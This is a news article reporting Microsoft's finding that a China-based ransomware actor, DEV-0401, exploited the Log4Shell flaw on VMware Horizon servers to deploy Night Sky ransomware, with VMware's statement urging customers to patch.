Microsoft: China-based ransomware actor exploiting Log4Shell

A threat actor is exploiting Log4Shell to deploy a new ransomware variant, according to Microsoft.

The details came via a Monday update to Microsoft's security guidance post dedicated to CVE-2021-44228, also called Log4Shell. It's a critical vulnerability in ubiquitous Java logging framework Log4j that was disclosed last month and quickly gained infamy for multiple reasons.

Microsoft's update called attention to a China-based ransomware operator, tracked as DEV-0401, that the company said was exploiting CVE-2021-44228 as early as Jan. 4. According to the post, the threat actor was targeting internet-facing servers running vulnerable instances of VMware Horizon, a virtualization product developed by VMware.

VMware Horizon-related Log4Shell exploitation is not new. The U.K. government's NHS Digital reported last week that threat actors had been observed attempting to establish malicious web shells on Horizon servers.

In a statement to SearchSecurity, a VMware spokesperson said the company continues to urge customers to apply the latest guidance according to its security advisory (VMSA-2021-0028), and that "the security of our customers is our top priority at VMware as we respond to the industry-wide Apache Software Foundation Log4j vulnerabilities."

"Any service connected to the internet and not yet patched for Log4j vulnerabilities is vulnerable to hackers, and VMware strongly recommends taking immediate action," the spokesperson said.

Microsoft said DEV-0401 was using command and control servers to spoof legitimate domains related to companies like Trend Micro (spoofed as "trendmrcio") and Sophos.

For this campaign, Microsoft said DEV-0401 is using Night Sky ransomware, a variant first reported by security research collective MalwareHunterTeam on Jan. 1 that targets large enterprises. The actor has also utilized other ransomware variants.

"DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473)," the post read.

Since Log4Shell was first reported in early December, attacks against vulnerable organizations have been constant. In addition to financially motivated threat actors, nation-state actors from countries like China, North Korea, Turkey and Iran have been observed exploiting the flaw.

It is unknown whether DEV-0401 is acting in a ransomware-as-a-service capacity or contractor capacity. Microsoft declined SearchSecurity's request for clarification.

Alexander Culafi is a writer, journalist and podcaster based in Boston.